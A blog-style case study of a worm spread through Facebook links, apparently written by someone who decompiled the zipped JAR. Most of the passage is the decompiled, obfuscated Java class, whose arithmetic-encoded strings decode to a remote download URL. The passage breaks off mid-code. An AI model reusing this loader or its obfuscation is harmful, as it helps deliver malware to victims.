Worms distributed via Facebook : a case study

Today, I got a message from one of my friends on Facebook that was essentially a link to a zip file. Without thinking much, I messaged him back asking him to check his computer for infections and whatnot, since it seems like he’s spreading malicious software without even knowing it.

However, I downloaded the file and was curious about its contents. The zip file contained just one JAR, which I disassembled with the Java Decompiler. The archive contained only one class, which looked like this :

import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.URI;
import java.net.URL;
import java.nio.file.CopyOption;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.text.DecimalFormat;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import javax.script.ScriptException;

public class SEHKFCJZGYHEDGSCHJBKM
{
  public static String PACVA()
    throws ScriptException
  {
    ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager();
    ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js");
    String[] FMMNX = { "461136/4434", "-740+856", "-1351+1467", "7318-7206", "-6018+6076", "-5833+5880", "8921-8874", "-3549+3649", "2156-2048", "66010/1435", "5236-5136", "6455-6341", "-3201+3312", "-6069+6181", "-8068+8166", "723165/6515", "-866+986", "296-179", "-8422+8537", "940714/9314", "153216/1344", "980100/9900", "4586-4475", "8896-8786", "934-818", "325220/3220", "755150/6865", "-2768+2884", "1040-994", "-4323+4422", "4358-4247", "-8361+8470", "-3568+3615", "9307-9192", "367399/7817", "6364-6309", "680882/5581", "-9530+9627", "-6313+6427", "-5956+6074", "4048-3946", "996516/9227", "188734/1586", "-1297+1345", "49950/925", "-7790+7899", "120491/2459", "-4500+4606", "932715/8883", "375678/6957", "-821+868", "2350-2250", "-5300+5346", "4221-4121", "-6193+6290", "-9459+9575", "503685/7995", "8617-8517", "-751+859", "352824/5784", "473634/9666", "5740-5676", "-4301+4365", "9091-8987", "388948/3353", "-2422+2538", "1036448/9254", "-1145+1203", "338635/7205", "114962/2446", "5729-5629", "3460-3352", "438242/9527", "15300/153", "712386/6249", "29304/264", "-3670+3782", "-6717+6815", "169608/1528", "5796-5676", "3704-3587", "5110-4995", "4639-4538", "823878/7227", "-7619+7718", "3775-3664", "-5896+6006", "1583-1467", "515504/5104", "-3088+3198", "9432-9316", "-8803+8849", "973467/9833", "41958/378", "5618-5509", "410498/8734", "6263-6148", "3440-3393", "-8165+8280", "4485-4388", "3499-3448", "765856/6838", "-8928+8982", "949977/7983", "146946/1289", "6836-6714", "165750/1625", "5648-5600", "534726/4383", "5549-5428", "-7817+7872", "2329-2224", "364656/7597", "6840-6793", "204500/2045", "6791-6745", "-858+958", "-933+1030", "-6006+6122", "438669/6963", "464400/4644", "-9655+9763", "-4675+4736", "4630-4581", "255552/3993", "65728/1027", "282-178", "24244/209", "521884/4499", "4370-4258", "428852/7394", "-8317+8364", "-6763+6810", "-5202+5302", "970488/8986", "2514-2468", "1832-1732", "1523-1409", "23643/213", "1103424/9852", "5326-5228", "-6127+6238", "-3871+3991", "6867-6750", "392725/3415", "-4749+4850", "-5776+5890", "-3205+3304", "-7456+7567", "8827-8717", "-9022+9138", "864762/8562", "-9006+9116", "830-714", "9665-9619", "-5379+5478", "515928/4648", "232-123", "920-873", "679880/5912", "954-907", "-7518+7633", "1055020/9095", "5730-5631", "9911-9792", "-216+338", "-8026+8140", "902779/9307", "3459-3358", "6858-6740", "4569-4515", "5635-5520", "969870/8817", "-1690+1745", "-2335+2386", "-1700+1755", "-3491+3538", "1768-1668", "-8527+8573", "940400/9404", "51+46", "1070332/9227", "475965/7555", "876500/8765", "110160/1020", "-8488+8549", "6513-6464", "-3977+4041", "275008/4297", "271-167", "24+92", "-8228+8344", "-7760+7872", "348986/6017", "276595/5885", "408383/8689", "489200/4892", "-4338+4446", "411424/8944", "1099-999", "8779-8665", "577755/5205", "787360/7030", "5202-5104", "849261/7651", "4570-4450", "5673-5556", "9854-9739", "570-469", "9859-9745", "256806/2594", "-7435+7546", "1003-893", "586844/5059", "391072/3872", "7810/71", "-2739+2855", "5815-5769", "769527/7773", "2882-2771", "-5331+5440", "3704-3657", "-223+338", "43+4", "-7771+7893", "-1857+1912", "29606/262", "157-38", "-4504+4612", "14859/127", "-3845+3899", "52+45", "205-153", "9406-9305", "-159+257", "1221-1104", "-4114+4228", "356304/6852", "300050/6001", "-3154+3201", "670600/6706", "-1535+1581", "-353+453", "22116/228", "-2494+2610", "-8650+8713", "58900/589", "537948/4981", "7183-7122", "-4825+4874", "-5980+6044", "4230-4166", "681-577", "3211-3095", "-3992+4108", "3505-3393", "3529-3471", "367352/7816", "222169/4727", "-2078+2178", "-1343+1451", "9926-9880", "-5404+5504", "-8830+8944", "-212+323", "172368/1539", "6795-6697", "668220/6020", "1170-1050", "1568-1451", "-6107+6222", "468842/4642", "4864-4750", "-9579+9678", "516039/4649", "10061-9951", "892736/7696", "271690/2690", "22770/207", "695420/5995", "-6274+6320", "8463-8364", "3889-3778", "79352/728", "103823/2209", "112815/981", "183488/3904", "-900+1010", "7202-7105", "-6126+6230", "1888-1780", "-7554+7609", "7958-7909", "353685/6205", "757460/6260", "314-196", "-1626+1675", "-4310+4409", "955800/8850", "239904/2352", "63448/616", "77688/747", "-8671+8718", "-6461+6561", "7146-7100", "6634-6534", "745348/7684", "-9099+9215", "-8588+8651", "948900/9489", "5333-5225", "5673-5612", "-2901+2950", "8802-8738", "3540-3476", "515320/4955", "328744/2834", "9929-9813", "-2114+2226", "310648/5356", "1343-1296", "-9606+9653", "392100/3921", "953748/8831", "298356/6486", "-1503+1603", "-8551+8665", "6414-6303", "-6596+6708", "40474/413", "-9106+9217", "312000/2600", "634842/5426", "-7126+7241", "604990/5990", "1573-1459", "6356-6257", "-4539+4650", "-1946+2056", "-404+520", "-7874+7975", "177100/1610", "8260-8144", "6378-6332", "-9413+9512", "8608-8497", "7745-7636", "9396-9349", "5069-4954", "-2046+2093", "75504/1573", "8980-8931", "-8443+8544", "704-587", "3704-3650", "-8226+8344", "9739-9682", "-8466+8573", "297654/5222", "1103106/9762", "792400/7924", "231876/2052", "-175+296", "-9148+9264", "861840/7980", "3479-3432", "637-537", "1881-1835", "-4621+4721", "-6429+6526", "30972/267", "401058/6366", "8269-8169", "-1446+1554", "1524-1463", "-607+656", "544384/8506", "-77+141", "910936/8759", "-6292+6408", "-952+1068", "432-320", "4503-4445", "4280-4233", "63403/1349", "1630-1530", "-3359+3467", "8694-8648", "-9898+9998", "-9501+9615", "-8317+8428", "344400/3075", "7918-7820", "1937-1826", "550440/4587", "566748/4844", "-664+779", "1921-1820", "-4745+4859", "-90+189", "5102-4991", "512710/4661", "4931-4815", "9354-9253", "1841-1731", "1935-1819", "7728-7682", "-984+1083", "-2320+2431", "-6061+6170", "-9297+9344", "8749-8634", "172772/3676", "7104-6995", "167100/3342", "3885-3765", "249730/2210", "5086-4983", "5991-5872", "255702/2243", "1102452/9932", "-7111+7229", "901-786", "1022814/8742", "-8849+8899", "-2120+2234", "-4544+4592", "211600/1840", "-6274+6321", "-4806+4906", "1503-1457", "9123-9023", "-9471+9568", "1673-1557", "516663/8201", "168100/1681", "1271-1163", "4968-4907", "455798/9302", "178-114", "3851-3787", "-8979+9083", "219588/1893", "-8409+8525", "-5166+5278", "267728/4616", "-718+765", "1175/25", "-3527+3627", "372168/3446", "3410-3364", "163000/1630", "226404/1986", "434676/3916", "-4681+4793", "-9164+9262", "-3548+3659", "693360/5778", "-2693+2810", "-2637+2752", "717908/7108", "5303-5189", "-2731+2830", "-723+834", "104610/951", "-9596+9712", "3026-2925", "-6041+6151", "-8848+8964", "-3271+3317", "873378/8822", "-138+249", "553284/5076", "64907/1381", "1024075/8905", "8630-8583", "1004880/8374", "-5564+5685", "9321-9214", "-5459+5513", "-7983+8102", "9532-9418", "472920/8445", "9424-9307", "8710-8659", "-2118+2175", "-2895+2951", "727872/7136", "243800/4600", "-4843+4956", "-1623+1740", "127-80", "563900/5639", "-5123+5169", "-1379+1479", "-8028+8125", "-1526+1642", "-1564+1627", "-1387+1487", "5269-5161", "465674/7634", "9599-9550", "559488/8742", "255168/3987", "-8692+8796", "-5448+5564", "333964/2879", "146272/1306", "316912/5464", "-2654+2701", "55789/1187", "2830-2730", "-8025+8133", "-5354+5400", "-3513+3613", "7889-7775", "2562-2451", "4618-4506", "-7661+7759", "-4752+4863", "4344-4224", "265473/2269", "3999-3884", "6425-6324", "503082/4413", "-7247+7346", "1099233/9903", "3503-3393", "-4022+4138", "989901/9801", "702570/6387", "-1096+1212", "9719-9673", "6204-6105", "173493/1563", "3937-3828", "350009/7447", "475180/4132", "296899/6317", "441408/9196", "932047/9049", "408250/8165", "-9133+9187", "4282-4176", "-6171+6221", "3945-3892", "-1269+1369", "-9425+9534", "-5759+5862", "378399/3409", "-1606+1718", "5063-4944", "-4926+5029", "22896/216", "-1693+1740", "398400/3984", "5979-5933", "422100/4221", "699-602", "-9025+9141", "1005-942", "6836-6736", "-16+124", "6865-6804", "-7532+7581", "5546-5482", "9849-9785", "236392/2273", "3646-3530", "9700-9584", "1829-1717", "-4694+4752", "1674-1627", "215072/4576", "571100/5711", "-2242+2350", "4911-4865", "7494-7394", "4328-4214", "786324/7084", "1504-1392", "-1287+1385", "7438-7327", "-9758+9878", "1113255/9515", "149270/1298", "7910-7809", "-5446+5560", "-2597+2696", "8403-8292", "6187-6077", "912456/7866", "459752/4552", "-4820+4930", "603200/5200", "204102/4437", "-3759+3858", "-70+181", "-5797+5906", "-1775+1822", "9660-9545", "-4374+4421", "1632-1580", "-375+473", "302100/5700", "4544-4434", "156528/3261", "1140984/9752", "367696/6566", "8507-8406", "4765-4646", "354046/2926", "-1438+1542", "97965/933", "814890/7086", "214434/2166", "21411/183", "8063-8016", "459100/4591", "3599-3553", "720300/7203", "-1964+2061", "8943-8827", "130473/2071", "-7369+7469", "-6776+6884", "250893/4113", "-6563+6612", "-941+1005", "-2639+2703", "2532-2428", "576984/4974", "927072/7992", "-1031+1143", "8464-8406", "8908-8861", "-3720+3767", "339-239", "-4228+4336", "-8837+8883", "382300/3823", "1074678/9427", "-5054+5165", "-9446+9558", "863380/8810", "4664-4553", "3616-3496", "503919/4307", "-9418+9533", "2968-2867", "4701-4587", "45639/461", "2066-1955", "-7918+8028", "156832/1352", "4354-4253", "241120/2192", "591368/5098", "9411-9365", "576873/5827", "1631-1520", "-5437+5546", "-1804+1851", "4344-4229", "64390/1370", "270000/2250", "-4596+4695", "292215/2415", "-8277+8328", "4545-4491", "-1386+1437", "2346-2243", "-9088+9138", "3061-2958", "446742/8273", "-9369+9481", "5751-5698", "-4641+4745", "9108-9056", "-8694+8802", "3055/65", "835400/8354", "340-294", "-8685+8785", "-9353+9450", "-8575+8691", "6216-6153", "-6815+6915", "131976/1222", "2132-2071", "169246/3454", "-4519+4583", "7969-7905", "-1108+1212", "774184/6674", "2204-2088", "-2068+2180", "-184+242", "138509/2947", "170798/3634", "-1783+1883", "-9583+9691", "7109-7063", "233100/2331", "5122-5008", "-1388+1499", "-6357+6469", "5294-5196", "522255/4705", "481200/4010", "-6150+6267", "-8036+8151", "4379-4278", "795264/6976", "-4116+4215", "-914+1025", "2300-2190", "760032/6552", "5831-5730", "281050/2555", "818844/7059", "-258+304", "879219/8881", "-5270+5381", "-2550+2659", "103447/2201", "1080655/9397", "49397/1051", "3042-2921", "7728-7618", "5783-5662", "597380/5020", "7047-6933", "475266/8338", "3835-3715", "-1532+1648", "-3819+3936", "921100/7550", "2370-2253", "984507/9201", "8428-8331", "242350/4847", "-7520+7628", "4899-4852", "-4573+4673", "56672/1232", "884900/8849", "9778-9681", "310184/2674", "4174-4111", "-2481+2581", "-3565+3673", "2263-2202", "-2248+2297", "521344/8146", "783-719", "-8178+8282", "1127-1011", "292436/2521", "-3505+3617", "6152-6094", "6926-6879", "-5292+5339", "9172-9072", "-5868+5976", "-2886+2932", "-3792+3892", "307002/2693", "-8309+8420", "3722-3610", "796152/8124", "4108-3997", "9196-9076", "1141452/9756", "-5524+5639", "1509-1408", "-3635+3749", "-3524+3623", "743145/6695", "797940/7254", "3518-3402", "-3765+3866", "9318-9208", "321320/2770", "420992/9152", "54450/550", "3860-3749", "-2989+3098", "341878/7274", "259-144", "8592-8545", "2389-2287", "436696/4199", "29925/525", "241920/4480", "986391/8289", "180166/1514", "-5867+5974", "9682/94", "860328/7966", "95139/961", "109000/2180", "-6475+6583", "-1977+2085", "-9341+9440", "-1184+1238", "-2754+2801", "417-317", "184322/4007", "664800/6648", "-158+255", "724072/6242", "433062/6874", "831900/8319", "8219-8111", "2406-2345", "458-409", "7627-7563", "-8126+8190", "5123-5019", "2252-2136", "2215-2099", "-9857+9969", "-9502+9560", "9783-9736", "49585/1055", "-5483+5583", "5281-5173", "-5999+6045", "-9863+9963", "-4708+4822", "1106559/9969", "4170-4058", "564480/5760", "14541/131", "715560/5963", "2041-1924", "-1677+1792", "-1512+1613", "4193-4079", "8046-7947", "-2698+2809", "-1917+2027", "9262-9146", "564590/5590", "1096590/9969", "207524/1789", "-4853+4899", "-8373+8472", "-5724+5835", "-3859+3968", "9027-8980", "5481-5366", "440719/9377", "1096692/9294", "7994-7937", "-5094+5204", "-923+971", "140178/1149", "-2102+2223", "217455/2071", "7503-7399", "67275/575", "117502/1199", "-96+212", "732950/6850", "150654/1266", "935180/8132", "9140-9026", "3965-3918", "457500/4575", "-5149+5195", "-7968+8068", "-4507+4604", "4628-4512", "8529-8466", "-1951+2051", "142128/1316", "2803-2742", "2981-2932", "373888/5842", "-7803+7867", "-3481+3585", "867912/7482", "1098056/9466", "4589-4477", "523102/9019", "466099/9917", "3150-3103", "2871-2771", "3787-3679", "1985-1939", "2191-2091", "896-782", "-9742+9853", "-4046+4158", "-1825+1923", "-7838+7949", "-2369+2489", "127881/1093", "-3133+3248", "-15+116", "-4074+4188", "6263-6164", "-6760+6871", "498740/4534", "327-211", "677003/6703", "963050/8755", "-4744+4860", "159666/3471", "-8843+8942", "556998/5018", "-6050+6159", "-9492+9539", "-2911+3026", "-6888+6935", "10000-9898", "80605/1645", "840000/8000", "6044-5935", "9004-8956", "-5620+5671", "6921-6820", "8709-8605", "282204/2613", "551799/5157", "1462-1346", "196040/1690", "-1502+1558", "724500/6300", "-7241+7344", "-7042+7089", "2987-2887", "2998-2952", "948700/9487", "665032/6856", "5215-5099", "1685-1622", "635500/6355", "886032/8204", "-3041+3102", "-6426+6475", "-5368+5432", "-8437+8501", "3314-3210", "502512/4332", "8226-8110", "384-272", "-8085+8143", "-9624+9671", "4735-4688", "6298-6198", "2133-2025", "-9580+9626", "936800/9368", "468996/4114", "598401/5391", "1006432/8986", "-5164+5262", "223554/2014", "297-177", "-5081+5198", "1079505/9387", "3150-3049", "539106/4729", "-3266+3365", "7775-7664", "632-522", "8914-8798", "125846/1246", "-9813+9923", "336052/2897", "-8495+8541", "421146/4254", "543900/4900", "8900-8791", "1569-1522", "53130/462", "5283-5236", "-1876+1979", "1765-1709", "-5496+5597", "2527-2478", "6443-6392", "4589-4480", "949192/8044", "-1969+2082", "62496/1116", "1665-1616", "426351/3841", "8514-8407", "5502-5395", "-6205+6306", "202200/1685", "-9673+9720", "-3528+3628", "8190-8144", "792900/7929", "-3097+3194", "42920/370", "512379/8133", "1682-1582", "-9799+9907", "325374/5334", "-3629+3678", "9373-9309", "9910-9846", "8492-8388", "3709-3593", "-314+430", "773024/6902", "-4498+4556", "-3051+3098", "-1877+1924", "3973-3873", "9126-9018", "405674/8819", "-3324+3424", "7576-7462", "-2002+2113", "-3676+3788", "-2123+2221", "3391-3280", "-4212+4332", "285948/2444", "8375-8260", "85244/844", "-1212+1326", "5731-5632", "1014984/9144", "943470/8577", "1032400/8900", "5703-5602", "564520/5132", "1021728/8808", "-7969+8015", "100089/1011", "4250-4139", "-2662+2771", "-9744+9791", "-1809+1924", "-6689+6736", "-5495+5610", "26553/501", "240450/4809", "123157/1151", "1470-1370", "6683-6576", "7646-7543", "892944/8268", "-7903+8008", "-9493+9604", "4522-4408", "6733-6626", "2491-2382", "63648/1326", "-974+1093", "-7375+7422", "5360-5260", "-8597+8643", "9792-9692", "9606-9509", "6430-6314", "8674-8611", "3806-3706", "-4287+4395", "556564/9124", "-3391+3440", "-2978+3042", "79680/1245", "-6071+6175", "-5385+5501", "1045624/9014", "210560/1880", "3916-3858", "2362-2315", "9389-9342", "5879-5779", "-7364+7472", "-1520+1566", "3252-3152", "578436/5074", "-6109+6220", "-5976+6088", "585550/5975", "-9446+9557", "985440/8212", "1038609/8877", "-4636+4751", "-1572+1673", "623124/5466", "8179-8080", "-2712+2823", "167640/1524", "9021-8905", "202404/2004", "5054-4944", "216920/1870", "-3310+3356", "4209-4110", "-2159+2270", "340734/3126", "120179/2557", "-7902+8017", "7412-7365", "903096/8362", "-4047+4148", "242403/2499", "9298-9198", "-8192+8307", "486304/4676", "6598-6487", "-8030+8145", "-6241+6344", "-4493+4597", "4185-4067", "-879+989", "-3459+3513", "349997/3271", "976852/9484", "5966-5919", "-3411+3511", "182344/3964", "2235-2135", "7625-7528", "-7574+7690", "8912-8849", "-1478+1578", "-1709+1817", "3538/58", "4054-4005", "2587-2523", "1259-1195", "237328/2282", "4533-4417", "-9724+9840", "9587-9475", "-8624+8682", "9025-8978", "-3505+3552", "-6776+6876", "-1127+1235", "252310/5485", "384000/3840", "-4909+5023", "4687-4576", "-5529+5641", "592018/6041", "2062-1951", "-875+995", "59+58", "5763-5648", "716696/7096", "5551-5437", "321948/3252", "3421-3310", "693440/6304", "622-506", "873246/8646", "-9724+9834", "6942-6826", "1506-1460", "3668-3569", "1292-1181", "-2209+2318", "57058/1214", "-4141+4256", "3517-3470", "7962-7845", "5442-5339", "99450/850", "972828/7974", "487600/4876", "-6947+7064", "2505-2396", "6178-6124", "704032/6286", "267978/2271", "1955-1851", "-4400+4508", "1463-1360", "-4385+4502", "105252/1074", "9915-9868", "883-783", "9997-9951", "583200/5832", "-4007+4104", "-1537+1653", "155736/2472", "897-797", "9380-9272", "150548/2468", "-8525+8574", "291200/4550", "-2519+2583", "8242-8138", "2537-2421", "-4458+4574", "-1294+1406", "288492/4974", "-788+835", "-2215+2262", "826500/8265", "-5590+5698", "8339-8293", "791200/7912", "5954-5840", "-4323+4434", "2041-1929", "-5629+5727", "2080-1969", "1836-1716", "6651-6534", "8934-8819", "469145/4645", "-9366+9480", "-9454+9553", "466533/4203", "771870/7017", "-5958+6074", "6190-6089", "858220/7802", "-2275+2391", "57316/1246", "-3802+3901", "-9335+9446", "1005961/9229", "54285/1155", "8518-8403", "-7823+7870", "307450/6149", "346492/3364", "7775-7668", "320096/5716", "713275/6925", "1961-1843", "-7369+7423", "4643-4531", "5602-5488", "2084-1967", "653400/6050", "1162511/9769", "-809+925", "5629-5519", "-9486+9592", "-5744+5791", "247900/2479", "261602/5687", "-6643+6743", "-767+864", "527800/4550", "2130-2067", "3956-3856", "-2052+2160", "1753-1692", "277291/5659", "10005-9941", "823-759", "3723-3619", "-3753+3869", "192676/1661", "744240/6645", "-140+198", "259111/5513", "391933/8339", "-3610+3710", "697032/6454", "267214/5809", "-6853+6953", "-4639+4753", "-7456+7567", "1496-1384", "-7036+7134", "6588-6477", "465000/3875", "5386-5269", "-6060+6175", "-4392+4493", "5983-5869", "2003-1904", "446331/4021", "8427-8317", "1067316/9201", "2233-2132", "-8164+8274", "739152/6372", "-9629+9675", "-8107+8206", "1020534/9194", "107583/987", "-8207+8254", "-8666+8781", "-4648+4695", "377178/3398", "-5933+6055", "439264/3922", "-5252+5349", "8800-8746", "1122360/9353", "6+99", "-9332+9383", "115453/1079", "-4461+4578", "523786/5186", "-7627+7681", "8467-8351", "3440-3318", "391771/3467", "412801/8783", "7523-7423", "336536/7316", "-530+630", "3983-3886", "-8944+9060", "3534-3471", "-8670+8770", "198936/1842", "179157/2937", "8888-8839", "88832/1388", "266176/4159", "-2528+2632", "653312/5632", "8506-8390", "109+3", "36540/630", "6264-6217", "-1044+1091", "-1096+1196", "3430-3322", "8166-8120", "7310-7210", "7328-7214", "666888/6008", "9133-9021", "-5775+5873", "21201/191", "-7771+7891", "205452/1756", "2727-2612", "1001617/9917", "807234/7081", "-9221+9320", "484737/4367", "972400/8840", "-5479+5595", "-9760+9861", "4590-4480", "-6944+7060", "4402-4356", "166815/1685", "-7593+7704", "-7229+7338", "-8145+8192", "949210/8254", "-5149+5196", "186-88", "90720/840", "385627/3187", "-9405+9519", "8432-8381", "10053-9940", "615069/5257", "9752-9644", "-2829+2945", "2163-2041", "410795/3395", "-5891+5945", "873886/7163", "7707-7597", "199302/1689", "5252-5205", "-1977+2077", "274528/5968", "4480-4380", "-5515+5612", "-1265+1381", "-358+421", "-770+870", "1871-1763", "6490-6429", "-3079+3128", "-649+713", "9720-9656", "127816/1229", "285-169", "8737-8621", "1812-1700", "431926/7447", "6575-6528", "444761/9463", "-1608+1708", "-9295+9403", "1145-1099", "-3163+3263", "1128600/9900", "-8965+9076", "187936/1678", "19698/201", "877011/7901", "131880/1099", "1166373/9969", "645725/5615", "378144/3744", "884754/7761", "6682-6583", "5108-4997", "6978-6868", "465160/4010", "-5936+6037", "-8888+8998", "3233-3117", "112608/2448", "173547/1753", "934842/8422", "-9633+9742", "-8287+8334", "122015/1061", "-9185+9232", "511-401", "4695-4582", "246-196", "747054/7546", "16848/156", "6884-6764", "1041376/9298", "245814/4638", "-380+478", "908096/8108", "7467-7418", "1991-1939", "496314/4242", "463191/4497", "7616-7507", "283645/6035", "-631+731", "-9425+9471", "1527-1427", "356087/3671", "750-634", "581364/9228", "494500/4945", "-6637+6745", "63684/1044", "373282/7618", "2797-2733", "-7249+7313", "48152/463", "1267-1151", "390920/3370", "2699-2587", "-3741+3799", "4039-3992", "4388-4341", "10035-9935", "7472-7364", "3009-2963", "703900/7039", "-1768+1882", "3989-3878", "-2428+2540", "1859-1761", "-997+1108", "896160/7468", "9975-9858", "2826-2711", "5551-5450", "8779-8665", "-9608+9707", "-2889+3000", "-2791+2901", "1091444/9409", "962833/9533", "1060840/9644", "766876/6611", "8089-8043", "4537-4438", "8676-8565", "9995-9886", "202993/4319", "-2066+2181", "9641-9594", "1240-1186", "439400/4394", "-8126+8178", "1569-1465", "1031803/9131", "5888-5831", "-390+499", "6926-6821", "727015/7495", "2654-2601", "-4765+4873", "7305-7208", "22781/209", "9164/79", "9732-9682", "379807/8081", "635900/6359", "2162/47", "-868+968", "368697/3801", "601808/5188", "5757-5694", "742600/7426", "284364/2633", "66917/1097", "324086/6614", "5472-5408", "1816-1752", "8744-8640", "-3693+3809", "-3808+3924", "2347-2235", "7587-7529", "-4639+4686", "453033/9639", "-3968+4068", "7742-7634", "8105-8059", "1974-1874", "130302/1143", "-3867+3978", "9258-9146", "745388/7606", "-6147+6258", "1861-1741", "-4457+4574", "6584-6469", "617817/6117", "-1147+1261", "730125/7375", "5865-5754", "-6220+6330", "351712/3032", "2090-1989", "594660/5406", "-6298+6414", "124246/2701", "9357-9258", "-2918+3029", "4900-4791", "-6028+6075", "-1320+1435", "-8833+8880", "193341/3791", "-4000+4117", "7277-7176", "989-875", "4746-4649", "905502/7943", "-6491+6546", "-9536+9586", "265742/2507", "-3708+3829", "306663/6013", "333617/3239", "-1314+1412", "-8100+8205", "-3346+3454", "-2672+2719", "-9219+9319", "2704-2658", "315100/3151", "6663-6566", "3204-3088", "8995-8932", "79300/793", "645300/5975", "212646/3486", "192325/3925", "542336/8474", "627200/9800", "289-185", "4809-4693", "-9579+9695", "1069488/9549", "392312/6764", "-3401+3448", "-4316+4363", "-4287+4387", "5817-5709", "2605-2559", "379300/3793", "-6022+6136", "378732/3412", "1069600/9550", "-5605+5703", "-4162+4273", "-5050+5170", "2218-2101", "1060185/9219", "1033-932", "-73+187", "3148-3049", "1096125/9875", "-5793+5903", "762700/6575", "-5287+5388", "506770/4607", "-1516+1632", "292008/6348", "7366-7267", "-6651+6762", "896089/8221", "478-431", "7107-6992", "-1043+1090", "817807/8431", "431054/3653", "954856/8024", "489888/8748", "302275/2675", "1101411/9747", "-3884+3982", "234498/2299", "402400/4024", "6473-6358", "3742-3640", "39984/714", "323907/3207", "26+31", "290472/5928", "4416-4369", "3708-3608", "56212/1222", "493500/4935", "4365/45", "-6149+6265", "-9227+9290", "490200/4902", "-5823+5931", "297436/4876", "7551-7502", "5293-5229", "423808/6622", "897-793", "-7916+8032", "5589-5473", "909328/8119", "-7967+8025", "-6910+6957", "-297+344", "2929-2829", "889596/8237", "9310-9264", "4811-4711", "520524/4566", "5861-5750", "430528/3844", "842702/8599", "393828/3548", "305040/2542", "8613-8496", "2302-2187", "141703/1403", "-3132+3246", "5021-4922", "925-814", "6273-6163", "-37+153", "377033/3733", "1096920/9972", "7381-7265", "8255-8209", "9546-9447", "34410/310", "60495/555", "752/16", "5600-5485", "-2588+2635", "-3180+3284", "881-833", "458900/9178", "-2808+2908", "-8996+9108", "411125/3575", "797680/6760", "804417/7247", "374132/3092", "-3703+3814", "920920/8372", "7044-6927", "-6653+6705", "4896-4777", "3179-3064", "158766/3378", "-2723+2823", "108008/2348", "378800/3788", "-3091+3188", "84448/728", "4158/66", "240500/2405", "334692/3099", "1170-1109", "-4080+4129", "-4619+4683", "320704/5011", "1164-1060", "973008/8388", "5409-5293", "1091-979", "9141-9083", "9400-9353", "132258/2814", "-8116+8216", "9072/84", "1235-1189", "-4633+4733", "466260/4090", "-267+378", "828-716", "239218/2441", "-1013+1124", "-2563+2683", "282204/2412", "-6120+6235", "2101-2000", "128478/1127", "-3313+3412", "-209+320", "4665-4555", "6356-6240", "-8404+8505", "-7696+7806", "6898-6782", "458252/9962", "-5038+5137", "633810/5710", "1939-1830", "-590+637", "8526-8411", "-9907+9954", "3061-3005", "8114-8017", "-6036+6087", "-251+367", "990784/8768", "982702/8258", "3697-3577", "-5585+5686", "7841-7739", "-8818+8924", "-8833+8955", "8662-8551", "177168/3691", "211152/3984", "8061-7948", "23970/510", "-454+554", "-8770+8816", "893900/8939", "680746/7018", "-7301+7417", "-5137+5200", "796900/7969", "262980/2435", "3583-3522", "309925/6325", "-3669+3733", "321728/5027", "3372-3268", "-1671+1787", "-2469+2585", "220416/1968", "1270-1212", "2632-2585", "166051/3533", "4436-4336", "7173-7065", "6174-6128", "3342-3242", "-2003+2117", "806-695", "-1117+1229", "101234/1033", "9313-9202", "-7006+7126", "3224-3107", "3999-3884", "-8288+8389", "1654-1540", "-8290+8389", "1540-1429", "-6272+6382", "-4157+4273", "207-106", "105380/958", "-8677+8793", "267674/5819", "2797-2698", "2528-2417", "-5027+5136", "85822/1826", "7124-7009", "160223/3409", "3950-3836", "-7987+8101", "-5176+5289", "4243-4192", "-7105+7221", "5725-5605", "-6086+6196", "139412/2681", "-6411+6526", "-5359+5457", "-9676+9794", "963696/9448", "6949-6893", "-3881+3931", "291042/2553", "-2674+2721", "237100/2371", "-7411+7457", "2447-2347", "-3285+3382", "-797+913", "480249/7623", "3561-3461", "-9865+9973", "572119/9379", "6221-6172", "101184/1581", "236096/3689", "8640-8536", "348/3", "1021148/8803", "3495-3383", "-7999+8057", "290037/6171", "8674-8627", "56400/564", "1629-1521", "6936-6890", "96200/962", "4510-4396", "156954/1414", "-4414+4526", "697662/7119", "-6591+6702", "4246-4126", "-6488+6605", "4935-4820", "7059-6958", "-4843+4957", "-707+806", "354090/3190", "-7188+7298", "-2993+3109", "10069-9968", "853820/7762", "-7397+7513", "6739-6693", "701118/7082", "-5362+5473", "60+49", "7774-7727", "414-299", "454443/9669", "5125-5008", "349468/7132", "879564/7924", "-4999+5100", "5200-5149", "-9626+9738", "382928/3419", "-2817+2924", "86926/887", "918720/9280", "-289+402", "5813-5704", "264650/5293", "-3291+3400", "7701-7648", "-2363+2410", "-8995+9095", "-8600+8646", "-3987+4087", "-3321+3418", "5793-5677", "5534-5471", "3906-3806", "-5402+5510", "370819/6079", "158613/3237" };
    DecimalFormat dec = new DecimalFormat("#.#");
    StringBuilder CYBNAFHZKEIKXPLC = new StringBuilder(FMMNX.length);
    for (int i = 0; i < FMMNX.length; i++) {
      Object MHNZLISTNGUBBLYPW = PTTQWFAFBA.eval(FMMNX[i]);
      int HOFMVNSB = Integer.parseInt(dec.format(MHNZLISTNGUBBLYPW));
      CYBNAFHZKEIKXPLC.append((char)HOFMVNSB);
    }
    return CYBNAFHZKEIKXPLC.toString();
  }

  public static String CAHWNGGYPLSBBUUNSBJ() throws ScriptException {
    ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager();
    ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js");
    String[] HYOZXBQ = { "1115-1048", "-6817+6875", "-3904+3996", "-5117+5209", "5298-5214", "-2006+2107", "85347/783", "-3448+3560", "538936/5858", "7300-7208" };
    DecimalFormat dec = new DecimalFormat("#.#");
    StringBuilder GPJSTAPR = new StringBuilder(HYOZXBQ.length);
    for (int i = 0; i < HYOZXBQ.length; i++) {
      Object XWHLAWQKM = PTTQWFAFBA.eval(HYOZXBQ[i]);
      int HOFMVNSB = Integer.parseInt(dec.format(XWHLAWQKM));
      GPJSTAPR.append((char)HOFMVNSB);
    }
    return GPJSTAPR.toString();
  }

  public static String YFQZBLOYEFEJKKEZX() throws ScriptException {
    ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager();
    ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js");
    String[] FYTFHDCQEJALCVHVO = { "5128-5060", "-2483+2569", "-8949+9034", "-2140+2228", "-906+993", "233358/5073", "3644-3577", "-1064+1134", "234868/3308" };
    DecimalFormat dec = new DecimalFormat("#.#");
